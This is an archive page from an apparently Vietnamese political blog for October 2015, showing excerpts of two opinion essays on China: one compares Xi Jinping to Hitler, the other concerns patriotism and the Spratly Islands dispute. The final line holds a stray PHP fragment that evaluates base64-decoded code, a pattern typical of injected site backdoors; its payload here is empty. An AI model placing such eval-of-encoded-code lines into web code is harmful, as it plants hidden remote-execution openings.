Archive for October, 2015

Tập Cận Bình phát biểu tương tự Hitler

Tập Cận Bình phát biểu tương tự Hitler

Lịch sử nhân loại đã chứng minh một chân lý rằng không có từ bi, bác ái nhân loại đã bị tận diệt từ lâu. Tuy nhiên, lịch sử loài người cũng không phải là con đường đầy xanh bóng mát mà là con đường có nhiều đoạn đầy máu nhu

10.1.2015 | Tiểu Luận- Chính Luận |

No Comments

Phải chăng lòng yêu nước đã tới hồi mệt mỏi?

Phải chăng lòng yêu nước đã tới hồi mệt mỏi?

Như một thói quen, buổi sáng 15 tháng 9, tôi vào mạng CNN, lướt qua một vòng tin nước Mỹ, tin thế giới và dừng lại ở các tin Đông Nam Á. Sáng hôm đó CNN loan tin Trung Cộng đang xây phi đạo thứ ba trong vùng đảo Trường Sa đang tranh chấp.

10.1.2015 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>